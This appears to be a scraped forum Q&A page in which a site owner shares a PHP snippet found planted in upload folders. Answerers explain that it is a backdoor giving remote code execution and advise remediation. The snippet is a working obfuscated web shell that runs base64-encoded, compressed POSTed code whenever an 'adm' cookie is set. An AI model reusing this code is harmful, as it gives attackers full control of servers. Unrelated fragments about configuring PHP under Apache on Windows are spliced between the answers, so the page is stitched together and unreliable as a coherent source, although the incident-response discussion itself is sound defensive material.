Menu
I have discovered the following code appear in two identical .php files on more than one of my server's websites. The files have inconspicuous names such as "reminder.php" (but a different name everytime) and appear in my /scripts/ and /uploads/ folders, sometimes other folders instead.
Their appearance is not entirely random but I don't know enough about Apache servers or PHP to know a) how it got there b) what it does.
Checking the logs they all appeared at similar times and were called once and that is all.
Any help would be greatly appreciated.
if (isset($_COOKIE["adm"])) {
if (isset($_POST['crc'], $_POST['cmd'])) {
if (sprintf('%u', crc32($_POST['cmd'])) == $_POST['crc']) {
eval(gzuncompress(base64_decode($_POST['cmd'])));
} else
echo "repeat_cmd";
}
}
762
Yes, of course they could - if the server is penetrated then any file on it is visible. Save this answer. Show activity on this post. Yes, it's entirely possible for someone to hack a server, via an exploit, or by stealing your password, or via buggy code you or others have written, or a number of different ways.
There are three ways to set up PHP to work with Apache 2. x on Windows. PHP can be run as a handler, as a CGI, or under FastCGI. Note: Remember that when adding path values in the Apache configuration files on Windows, all backslashes such as c:\directory\file.
After Apache decides that is is a PHP file, it gives it to the PHP interpreter. When PHP receives the file it reads through it and executes any PHP code it can find. After it is done with the file, the PHP interpreter gives the output of the code, if any, back to Apache.
The file allows malicious person(s) to execute any PHP code they want on your system.
Basically, if certain validations have been met (i.e. the malicious person has that given cookie value), it will take the POSTed "cmd", base64 decode it, gzip uncompress it, and evaluate it as PHP.
I'd recommend changing your passwords, and maybe reinstalling apache for good measure. Remove these files immediately as well, or if at all remotely possible, restore from a backup.
124
This code will execute (on the server) any arbitrary code it finds in the POST request if the key adm is present in the client's cookie. That request will be Base-64 encoded and encrypted to obfuscate its contents. Any code at all may be executed, including one to format your hard drive (if your PHP server is set to allow that).
You have been hacked. Take the server offline, right now. Get some help running an analysis before you wipe your host, if you can - you don't want to reinstall and go online, just to get hacked again. Changing all your passwords and locking down your server is a good start.
26
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With
